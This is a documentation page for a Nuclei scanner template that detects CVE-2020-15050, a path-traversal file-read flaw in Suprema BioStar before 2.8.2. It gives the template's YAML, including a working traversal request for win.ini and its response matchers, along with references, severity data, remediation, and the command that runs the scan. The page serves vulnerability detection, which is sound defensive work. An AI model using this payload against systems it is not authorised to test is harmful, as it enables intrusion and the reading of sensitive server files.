Skip to content
Nuclei Templates

Suprema BioStar <2.8.2 - Local File Inclusion

ID: CVE-2020-15050

Severity: high

Author: gy741

Tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc

Description

Section titled “Description”

Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.

YAML Source

Section titled “YAML Source”
id: CVE-2020-15050


info:
  name: Suprema BioStar <2.8.2 - Local File Inclusion
  author: gy741
  severity: high
  description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.
  reference:
    - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
    - https://www.supremainc.com/en/support/biostar-2-pakage.asp
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-15050
    cwe-id: CWE-22
    epss-score: 0.55214
    epss-percentile: 0.9766
    cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: supremainc
    product: biostar_2
  tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc


http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"


    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a00463044022004c1ef051a82c5edbb04a69582481e9570a03bf13926f3e1cf3c7bf267b96c2f02206952e0445d13d17ee681a0671f79a3ec335e8d73fd15bae31f60a0d40bbf253c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15050.yaml"

View on Github